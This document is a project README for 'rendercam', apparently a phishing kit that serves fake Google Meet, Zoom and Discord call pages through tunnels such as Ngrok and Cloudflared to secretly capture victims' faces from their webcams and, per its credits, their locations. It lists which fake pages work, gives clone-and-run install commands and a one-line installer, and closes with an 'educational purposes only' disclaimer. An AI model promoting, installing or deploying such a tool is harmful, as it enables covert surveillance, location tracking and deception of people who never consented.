A tool used to create a fake video call that secretly captures user's faces through their webcam.
- Latest and fully updated pages.
- Beginner friendly
- Multiple tunneling options
- Localhost
- Cloudflared
- Ngrok
- Termux support
| Website | Status |
|---|---|
| Google Meet | Working |
| Zoom Call | Working |
| Discord Call | Working |
- More to be added in the future!
-
Just, clone this repository -
git clone --depth=1 https://github.com/render437/rendercam.git -
Create and activate a virtual environment -
python3 -m venv venv source venv/bin/activate -
Now go to cloned directory and run
rendercam.sh-$ cd rendercam $ bash rendercam.sh -
On first launch, it'll install the dependencies automatically. That's it, rendercam is installed!
- Paste this command into your terminal -
git clone --depth=1 https://github.com/render437/rendercam.git; cd rendercam; bash rendercam.sh
- Just paste this command into your terminal -
cd; sudo rm -r rendercam
rendercam requires following programs to run properly -
gitcurlphppython
All the dependencies will be installed automatically when you run rendercam for the first time.
- Ubuntu
- Debian
- Arch
- Manjaro
- Fedora
- Termux
Thanks to these amazing people for helping me build and improve this project!
| Collaborator | Contribution |
|---|---|
| Aditya Shakya | UI/UX design and styling |
| techchipnet | Helped with image saving functionability |
| Kr3sZ | Discord and Zoom HTML formatting |
| Prateek | Designed google maps location saving |
Any actions and or activities related to rendercam is solely your responsibility. The misuse of this toolkit can result in criminal charges brought against the persons in question. The contributors will not be held responsible in the event any criminal charges be brought against any individuals misusing this toolkit to break the law.
This toolkit contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way.
This tool is provided strictly for educational and research purposes to demonstrate how phishing works and what it is. Do not use any information, code, or techniques contained here to attempt unauthorized access to someone else’s accounts or systems — doing so is illegal. Use this toolkit at your own risk.
Do not attempt to violate the law with anything contained here. If this is your intention, then get the hell outta here!
If you are unsure about the legality of an action, seek professional legal advice before proceeding. You shall not misuse the information to gain unauthorized access to someones social media.
This project is for educational, penetration-testing, or phishing-simulation purposes only.
- Not for malicious use.